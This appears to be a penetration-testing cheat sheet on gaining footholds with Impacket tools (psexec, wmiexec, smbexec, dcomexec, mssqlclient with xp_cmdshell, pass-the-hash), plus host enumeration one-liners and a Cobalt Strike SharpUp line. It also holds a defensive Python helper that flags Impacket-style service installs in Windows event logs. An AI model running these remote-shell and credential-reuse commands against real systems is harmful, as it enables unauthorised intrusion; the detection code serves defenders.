Footholds

Using Impacket Remote Tools:

Syntax: {variable-placeholder} marks a value you supply

Without -c {cmd}, each of the *exec tools below returns an interactive cmd shell on the target

Impacket Examples Folder:

  • mssqlclient.py - Provides a SQL shell on the target MSSQL server

  • psexec.py - Executes a file on a remote host

  • smbexec.py - Executes a file on a remote host using SMB

  • wmiexec.py - Executes a file on a remote host using WMI

  • dcomexec.py - Provides a limited shell via DCOM

mssqlclient.py - example:

  • python mssqlclient.py {sql-usr}:{Pswd}@{SqlSvr-ip}

    • From the SQL> prompt:

      • SELECT name FROM master.dbo.sysdatabases WHERE name NOT IN ('master', 'tempdb', 'model', 'msdb');

      • SELECT TOP(5) * FROM {tbl-name};

      • EXEC master.dbo.xp_cmdshell '{cmd-2-exec}';  (xp_cmdshell is disabled by default on SQL Server; enabling it is a logged configuration change)

psexec.py - example:

  • python psexec.py {domain}/{user}:{Pswd}@{tgt-ip}

  • python psexec.py {domain}/{user}:{Pswd}@{tgt-ip} -c {path/2/File.ext}

  • python psexec.py -hashes {LM-hash}:{NTLM-hash} {domain}/{user}@{tgt-ip} {cmd}

    • The LM half may be left empty (-hashes :{NTLM-hash}); {cmd} is optional and defaults to a cmd shell

wmiexec.py - example:

  • python wmiexec.py {domain}/{user}:{Pswd}@{tgt-ip}

  • python wmiexec.py {domain}/{user}:{Pswd}@{tgt-ip} -c {path/2/File.ext}

dcomexec.py - example:

  • python dcomexec.py {domain}/{user}:{Pswd}@{tgt-ip} 
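
The service-based tools above leave a trace in the System log (Event ID 7045, "A service was installed"). The triage helper below is an added example, not part of this cheat sheet or of Impacket; the event records are constructed and simplified, and the name patterns it keys on are the tools' well-known defaults (psexec.py: 4-letter service name and 8-letter .exe dropped into ADMIN$; smbexec.py: service "BTOBTO" with a %COMSPEC% ImagePath writing to \\127.0.0.1\C$\__output), which an operator can change, so treat them as heuristics.

```python
import re

# Constructed sample 7045/7036 records, flattened to dicts for the example.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "Spooler",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe"},
    {"EventID": 7045, "ServiceName": "gJkQ",              # psexec.py-style
     "ImagePath": r"%systemroot%\QxWcLpRa.exe"},
    {"EventID": 7045, "ServiceName": "BTOBTO",            # smbexec.py default
     "ImagePath": r"%COMSPEC% /Q /c echo dir ^> \\127.0.0.1\C$\__output 2^>^&1 "
                  r"> %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat"},
    {"EventID": 7036, "ServiceName": "Spooler", "ImagePath": ""},  # state change, not an install
]

# Short, letters-only service name (no digits, spaces or vendor prefixes).
RANDOM_NAME = re.compile(r"^[A-Za-z]{4,8}$")
# 8-letter .exe directly under %SystemRoot% (the ADMIN$ share).
RANDOM_EXE = re.compile(r"^(?:%systemroot%|C:\\Windows)\\[A-Za-z]{8}\.exe$", re.IGNORECASE)


def classify_service_install(ev):
    """Return a reason string if a 7045 record looks like an Impacket-style install, else None."""
    if ev.get("EventID") != 7045:
        return None
    name = ev.get("ServiceName", "")
    image = ev.get("ImagePath", "")
    if RANDOM_NAME.match(name) and RANDOM_EXE.match(image):
        return "psexec.py-style: random service name + random exe in %SystemRoot%"
    if name.upper() == "BTOBTO" or ("%COMSPEC%" in image.upper() and "__output" in image):
        return "smbexec.py-style: COMSPEC batch service redirecting output to an admin share"
    # Any service whose binary is a shell one-liner deserves a look regardless of name.
    if image.upper().startswith("%COMSPEC%") or "cmd.exe /" in image.lower():
        return "service ImagePath is a shell one-liner"
    return None


def triage(events):
    """List (ServiceName, reason) for every record that trips a heuristic."""
    hits = []
    for ev in events:
        reason = classify_service_install(ev)
        if reason:
            hits.append((ev["ServiceName"], reason))
    return hits


if __name__ == "__main__":
    for svc, why in triage(SAMPLE_EVENTS):
        print(f"{svc}: {why}")
```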

Documenting Hosts from Cmd Shells

Windows Hosts:

  • hostname & ver & ipconfig | findstr /i "ipv4"

*nix Hosts:

  • uname -a && ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'   (a single & would background uname; substitute your interface for eth0)

Privilege Escalation Techniques

SharpUp.exe (https://github.com/GhostPack/SharpUp):

  • Via Cobalt Strike Beacon: execute-assembly SharpUp.exe

Placeholder - more to come!:


Pentest-Zen (ExitC0de00c.com)